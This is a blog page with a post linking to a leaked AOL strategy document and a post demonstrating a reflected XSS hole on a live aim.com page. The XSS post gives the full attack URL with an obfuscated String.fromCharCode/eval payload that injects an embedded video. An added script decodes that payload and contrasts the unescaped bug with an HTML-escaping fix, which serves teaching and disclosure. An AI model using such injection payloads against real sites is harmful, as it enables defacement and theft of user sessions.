Showing posts with label aol. Show all posts

Wednesday, March 23, 2011

AOL Way - PDF copy of the leaked master plan

AOL is working to make a comeback... they have a new logo and are trying to push back into the market after failing with all those free CDs. So here are some of their aspirations:

  • He wants pageviews per story to jump from 1,500 to 7,000.
  • He wants video stories to go from being 4% of all stories produced to 70%.
  • He wants the percentage of stories optimized for search engines to reach 95%.

Where did we get all this? The people over at Business Insider found it for us :) then I went and dug up the PDF version and posted it to SlideShare for everyone.


Some people are already asking on Quora if this type of leak should be legal... well, some people had better keep hold of their docs a little better, I guess.

Oh, and if you can't get it from SlideShare, here's another copy of the leaked AOL document on Google Docs.

Thursday, August 26, 2010

Attack demonstration of XSS hole in AOL's personalized email landing page

Here's my video about exploiting cross-site scripting attacks in the wild. I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 minutes.

See the attack and video live on the page

or watch below (I'll have this link live as long as it works)

The JavaScript we inject is shown below,

which URL-encodes to the following attack URL (the injected markup is hidden in a String.fromCharCode list so the payload itself carries no quotes):
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E
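As an added example (this is not code from the original post and not AOL's code), the following JavaScript decodes the payload carried in the aimID parameter of the URL above and then contrasts an unescaped reflection of that parameter with an HTML-escaped one. The two render functions are a hypothetical reconstruction of the bug pattern the post describes; the landing page's real server-side template is not on the page.

```javascript
// Added example, not from the original post. Decodes the XSS payload carried in
// the aimID parameter of the URL quoted above, then contrasts an unescaped
// reflection of that parameter (a hypothetical reconstruction of the bug, not
// AOL's real server-side code) with an HTML-escaped one.

// The attack URL exactly as quoted in the post.
const ATTACK_URL = "http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E";

// Step 1: read the reflected parameter the way a server would. URLSearchParams
// percent-decodes it, turning %3Cscript%3E back into <script>.
function extractParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Step 2: the markup was smuggled as a String.fromCharCode(...) list so the
// payload needs no quotes or angle brackets of its own. Recover the string that
// the eval() in the payload would have executed, without calling eval.
function decodeFromCharCode(script) {
  const m = script.match(/String\.fromCharCode\(([\d,\s]+)\)/);
  if (!m) throw new Error("no String.fromCharCode(...) call found");
  const codes = m[1].split(",").map((n) => Number(n.trim()));
  return String.fromCharCode(...codes);
}

// Step 3a: the bug pattern. Untrusted input is concatenated straight into HTML.
// (Hypothetical reconstruction; the page's actual template is not in the post.)
function renderUnsafe(aimID) {
  return `<h1>Welcome, ${aimID}</h1>`;
}

// Step 3b: the fix. Entity-encode the five HTML-significant characters before
// the value lands in an element body.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(aimID) {
  return `<h1>Welcome, ${escapeHtml(aimID)}</h1>`;
}

// A rendered page is still exploitable if a real <script> element survived.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run the whole chain and return the pieces a reviewer would want to inspect.
function demo() {
  const aimID = extractParam(ATTACK_URL, "aimID");
  const injected = decodeFromCharCode(aimID);
  return {
    aimID,                                                   // carterkixass<br><script>eval(...)</script>
    injected,                                                // document.write("<object ...>...</object>");
    unsafeExecutes: containsScriptTag(renderUnsafe(aimID)),  // true
    safeExecutes: containsScriptTag(renderSafe(aimID)),      // false
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = demo();
  console.log("decoded payload:\n" + r.injected);
  console.log("unsafe render executes script:", r.unsafeExecutes);
  console.log("escaped render executes script:", r.safeExecutes);
}
```

Run it with node and the decoded payload comes out as a single document.write() call that drops a 480x385 Flash <object>/<embed> pair pointing at the YouTube video onto AOL's origin. The `%3Cbr%3E` in front of the script tag is just there to break the injected content onto its own line. Note that escapeHtml() is the right fix only for text inside an element body; a value reflected into an attribute, a URL or a script block needs the encoding for that context instead.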

This is a demonstration of a live attack meant for educational purposes only. If you want to see my copy, it is here: AOL XSS attack landing page. If you are having issues with XSS attacks on your domain or would like help securing your application, contact me; I'd love to help.

P.S. The tool I used for the string encoding is here.